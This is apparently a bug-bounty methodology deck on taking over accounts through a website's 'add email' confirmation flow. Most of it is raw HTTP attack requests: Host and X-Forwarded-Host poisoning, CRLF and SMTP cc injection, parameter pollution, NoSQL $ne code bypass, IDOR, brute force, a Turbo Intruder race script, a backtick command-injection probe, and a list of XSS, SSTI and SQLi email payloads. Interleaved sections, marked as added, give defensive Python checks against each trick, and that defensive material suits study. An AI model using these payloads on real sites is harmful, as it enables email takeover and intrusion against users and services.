Adding Email

The document discusses various techniques for manipulating HTTP headers to trick a website into sending an email confirmation code to an attacker's domain, including changing the host header, adding additional host headers, using non-standard headers, and ambiguating values in headers like using [email protected]. The goal is to get the confirmation email sent to the attacker instead of the intended recipient.

ETO

Adding E-mail

Mahmoud M. Awali
@0xAwali

My Methodology

Try To Change Host Header e.g. Host: me.com To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Override The Host Header e.g. POST https://company.com AND Change Host Header e.g. Host: me.com To Get The Confirmation Code

POST https://company.com/addEmail HTTP/1.1
Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Ambiguate The Host Header e.g. Host: [email protected] To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: [email protected]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Ambiguate The Host Header e.g. Host: company.com:@me.com To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: company.com:@me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Ambiguate The Host Header e.g. Host: company.com: me.com To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: company.com: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Change Routing Of The Request e.g. POST @me.com/addEmail OR POST :@me.com/addEmail To Get The Confirmation Code

POST @me.com/addEmail HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Change Routing Of The Request e.g. POST /[email protected]# OR POST @me.com/addEmail To Get The Confirmation Code

POST /[email protected]# HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Change Routing Of The Request e.g. POST /[email protected]# OR POST /addEmail:@me.com# With HTTP/1.0 To Get The Confirmation Code

POST /[email protected]# HTTP/1.0
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Add Another Host Header e.g. Host: me.com To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: www.company.com
Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Add Another Space-surrounded Host Header e.g. Host:me.com To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: www.company.com
Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Change Host Header e.g. Host: me.com AND Add X-Forwarded-Host Header Too e.g. X-Forwarded-Host: me.com To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: me.com
X-Forwarded-Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Change Host Header e.g. Host: me.com AND Add X-Forwarded-Host Header Too e.g. X-Forwarded-Host: company.com To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: me.com
X-Forwarded-Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Add X-Forwarded-Host Header e.g. X-Forwarded-Host: company.com AND Referer Header Too e.g. Referer: https://me.com To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: www.company.com
X-Forwarded-Host: me.com
Referer: https://me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Use Non-Standard Headers e.g. X-Forwarded-For, X-Forwarded-Host, X-Client-IP, True-Client-IP AND X-Originating-IP etc. To Get The Confirmation Code

POST /addEmail HTTP/1.1
Host: www.company.com
X-Forwarded-For: me.com
X-Forwarded-Host: me.com
X-Client-IP: me.com
X-Originating-IP: me.com
X-WAP-Profile: https://me.com/file.xml
True-Client-IP: me.com
Referer: https://me.com/
Content-Length: Number

[email protected]&csrf=*******

Try To Use Non-Standard Headers e.g. X-Forwarded-For, X-Forwarded-Host, X-Client-IP, True-Client-IP AND X-Originating-IP With e.g. [email protected]

POST /addEmail HTTP/1.1
Host: www.company.com
X-Forwarded-For: [email protected]
X-Forwarded-Host: [email protected]
X-Client-IP: [email protected]
X-Originating-IP: [email protected]
X-WAP-Profile: https://[email protected]/file.xml
True-Client-IP: [email protected]
Referer: https://[email protected]/
Content-Length: Number

[email protected]&csrf=*******

Try To Use Non-Standard Headers e.g. X-Forwarded-For, X-Forwarded-Host, X-Client-IP, True-Client-IP AND X-Originating-IP With e.g. me.com/.company.com

POST /addEmail HTTP/1.1
Host: www.company.com
X-Forwarded-For: me.com/.company.com
X-Forwarded-Host: me.com/.company.com
X-Client-IP: me.com/.company.com
X-Originating-IP: me.com/.company.com
X-WAP-Profile: https://me.com/.company.com/file.xml
True-Client-IP: me.com/.company.com
Referer: https://me.com/.company.com
Content-Length: Number

[email protected]&csrf=*******

Try To Use CRLF and Host Header Injection e.g. ?0a%0dHost:me.com AND You Can Use Other Headers e.g. X-Host, True-Client-IP AND X-Forwarded-Host etc.

POST /resetPassword?0a%0dHost:me.com HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
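
Every Host, routing and proxy-header slide above works only if the server builds the confirmation link, or picks the mail route, from a header the client controls. As an added example (not from the deck), here is the check a defender puts in front of the mailer in Python: exactly one Host header, strict syntax, an allowlist, and a link built from a configured origin so X-Forwarded-Host, Referer and the other proxy headers are never consulted. CANONICAL_ORIGIN, ALLOWED_HOSTS and the function names are assumptions; the host values match the deck's placeholders.

```python
import re
from urllib.parse import urlencode

# Configured server-side (assumed values): the mailer never reads the origin
# from the request, so no header can redirect the confirmation link.
CANONICAL_ORIGIN = "https://www.company.com"
ALLOWED_HOSTS = {"www.company.com", "company.com"}
# A reg-name plus an optional numeric port and nothing else: '@', ':@', '/',
# spaces and CR/LF all fail, so userinfo and path tricks never parse as a host.
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(?::[0-9]{1,5})?$")


def effective_host(raw_headers):
    """Return the validated host name or None.

    raw_headers is the list of (name, value) pairs as received, so a second
    Host header is detected instead of being silently merged or overwritten.
    """
    hosts = [v for n, v in raw_headers if n.lower() == "host"]
    if len(hosts) != 1:             # missing or duplicated Host: reject
        return None
    host = hosts[0]
    if not _HOST_RE.match(host):    # company.com:@me.com, company.com: me.com, ...
        return None
    name = host.rsplit(":", 1)[0].lower()   # drop a legitimate :443
    return name if name in ALLOWED_HOSTS else None


def confirmation_link(raw_headers, token):
    """Link placed in the e-mail, or None if the request must be dropped.

    X-Forwarded-Host, Referer and the other proxy headers are never consulted.
    """
    if effective_host(raw_headers) is None:
        return None
    return CANONICAL_ORIGIN + "/addEmail/verify?" + urlencode({"code": token})
```

The CRLF variant is covered by the same rule: an injected header never reaches the link because the origin is a constant, and a CR or LF inside a Host value fails the regex.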

Try To Add An Email e.g. [email protected]ğhotmail.com, Maybe The Backend Thinks Your Email Is [email protected]?hotmail.com So You Can Take Over This Email

Try To Use CRLF and SMTP Injection e.g. [email protected]%0a%0dcc:[email protected] To Receive The Confirmation Code In Your Mail

POST /resetPassword HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]%0a%0dcc:[email protected]&csrf=*******

Try To Use The Parameter Pollution Technique e.g. [email protected]&[email protected] To Get The Confirmation Code Too

POST /resetPassword HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&[email protected]&csrf=*******

Try To Use Separators e.g. |, %20 OR , (Comma) To Get The Confirmation Code Too

POST /resetPassword HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected],[email protected]&csrf=*******

Try To Change The Content-Type Header To application/json AND Insert The Value Of Email As An Array e.g. {"email":["[email protected]","[email protected]"]} To Get The Confirmation Code Too

POST /resetPassword HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":["[email protected]","[email protected]"],"csrf":"*******"}

Sometimes They Ping Your Host Before Sending A Mail, So Try To Use A Burp Collaborator Mail Address With OS Command Injection To Get RCE

POST /resetPassword HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

email=me@`whoami`.id.collaborator.net&csrf=*******

Use This List Of Payloads As Email Addresses To Get XSS, SSTI, SQLi OR To Abuse The Database

me+(<script>alert(0)</script>)@gmail.com
me(<script>alert(0)</script>)@gmail.com
me@gmail(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
"<%= 7 * 7 %>"@gmail.com
me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
"me); DROP TABLE users;--"@gmail.com
me@[id.collaborator.net]
%@gmail.com
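
From the CRLF/SMTP injection slide through the payload list above, every trick depends on the recipient parameter accepting something other than one plain mailbox: a folded header, two values, a separator, a JSON array or operator, or shell/markup metacharacters. As an added example (not from the deck), a Python validator that accepts exactly one address and rejects all of those; the regex is deliberately narrower than RFC 5322, and the function names and sample values are constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Deliberately narrower than RFC 5322 (no quoted local parts, comments,
# address literals, '%' routing or IDN): letters, digits and ._+- only.
_MAILBOX_RE = re.compile(
    r"^[A-Za-z0-9._+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}$"
)
# Any of these inside the value means header folding, a second recipient,
# or a shell/SQL/template/markup payload rather than one mailbox.
_FORBIDDEN = set("\r\n\t ,;|`'\"<>()[]{}$%")


def single_recipient(value):
    """Return the normalised mailbox, or None if the value is not exactly one.

    value is the decoded parameter: a str from a form body, or whatever
    json.loads produced for a JSON body, which must also be a str.
    """
    if not isinstance(value, str):        # ["a","b"], {"$ne": ...}, numbers
        return None
    if len(value) > 254 or _FORBIDDEN.intersection(value):
        return None
    if not _MAILBOX_RE.match(value):
        return None
    local, domain = value.rsplit("@", 1)
    return local + "@" + domain.lower()


def recipient_from_form(body):
    """E-mail from an application/x-www-form-urlencoded body.

    parse_qs keeps every repeated key, so email=a&email=b (parameter
    pollution) is visible and rejected instead of first- or last-wins.
    """
    values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1:
        return None
    return single_recipient(values[0])


def recipient_from_json(doc):
    """E-mail from a parsed JSON body; arrays and operator objects fail."""
    if not isinstance(doc, dict):
        return None
    return single_recipient(doc.get("email"))
```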

Enter The Correct Email AND A Wrong Code, Then Try To Manipulate The Response, Changing It Into The Response For The Correct Confirmation Code, To Get ETO

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length

{
  "email": "[email protected]",
  "code": ******
}

Try To Use The IDOR Technique By Inserting The Email Address Of The Victim e.g. [email protected] With Your Token To Take Over This E-mail

POST /addEmail/Verify HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&code=Your-Token&csrf=*******

Try To Change The Content-Type Header To application/json AND Insert The Value Of Code As An Array e.g. {"code":["$ne","WrongCODE"]} To Bypass The Confirmation Code

POST /addEmail/Verify HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"[email protected]","csrf":"*******","code":{"$ne":"wrong"}}

Try To Brute Force The Confirmation Code Using Multiple IPs Or Using The IP Rotate Burp Suite Extension

POST /addEmail/Verify HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&code=FUZZ&csrf=*******

Try To Figure Out The Reaction Of The Server To A Race Condition By Using Turbo Intruder OR Nuclei To Send Simultaneous Requests

POST /addEmail/verify HTTP/1.1
Host: www.company.com
X-Test: %s

[email protected]&otp=wrongOTP&csrf=*******

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    # Queue 30 copies behind one gate so Turbo Intruder releases them together
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')
    engine.openGate('race1')
    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)
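
The IDOR, $ne, brute-force and race slides above all hit the same verification step. As an added example (not from the deck, and not Turbo Intruder code), a Python sketch of that step hardened against all four: the code is bound server-side to (user, pending e-mail), only string codes are compared, attempts are capped, and the pending record is claimed inside one lock so concurrent submissions cannot both succeed. The in-memory store, MAX_ATTEMPTS and the race() helper are assumptions standing in for a real database and a real intruder.

```python
import hmac
import threading

MAX_ATTEMPTS = 5  # wrong guesses allowed per pending request (assumed policy)


class PendingEmailStore:
    """In-memory stand-in for the database table of pending e-mail changes."""

    def __init__(self):
        self._lock = threading.Lock()
        # key = (user_id, email): the code is only valid for the user who
        # requested it AND the address it was sent to, which closes the IDOR.
        self._pending = {}

    def issue(self, user_id, email, code):
        with self._lock:
            self._pending[(user_id, email)] = {"code": code, "attempts": 0}

    def verify(self, user_id, email, submitted):
        """Return True exactly once for the right code, False otherwise."""
        # Only plain strings are compared: {"$ne": ...}, lists and numbers
        # arriving from a JSON body never reach the lookup.
        if not isinstance(submitted, str) or not isinstance(email, str):
            return False
        with self._lock:  # one critical section: no check-then-act window
            key = (user_id, email)
            rec = self._pending.get(key)
            if rec is None:
                return False  # no pending change by this user for this address
            rec["attempts"] += 1
            if rec["attempts"] > MAX_ATTEMPTS:
                del self._pending[key]  # burn the code; the user must re-request
                return False
            if hmac.compare_digest(rec["code"].encode(), submitted.encode()):
                del self._pending[key]  # single use: later or concurrent submits fail
                return True
            return False


def race(store, user_id, email, submitted, n=30):
    """Submit the same code n times at once (what a Turbo Intruder gate does)."""
    results = []
    workers = [threading.Thread(target=lambda: results.append(
        store.verify(user_id, email, submitted))) for _ in range(n)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return results
```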
Thank You
Mahmoud M. Awali
@0xAwali
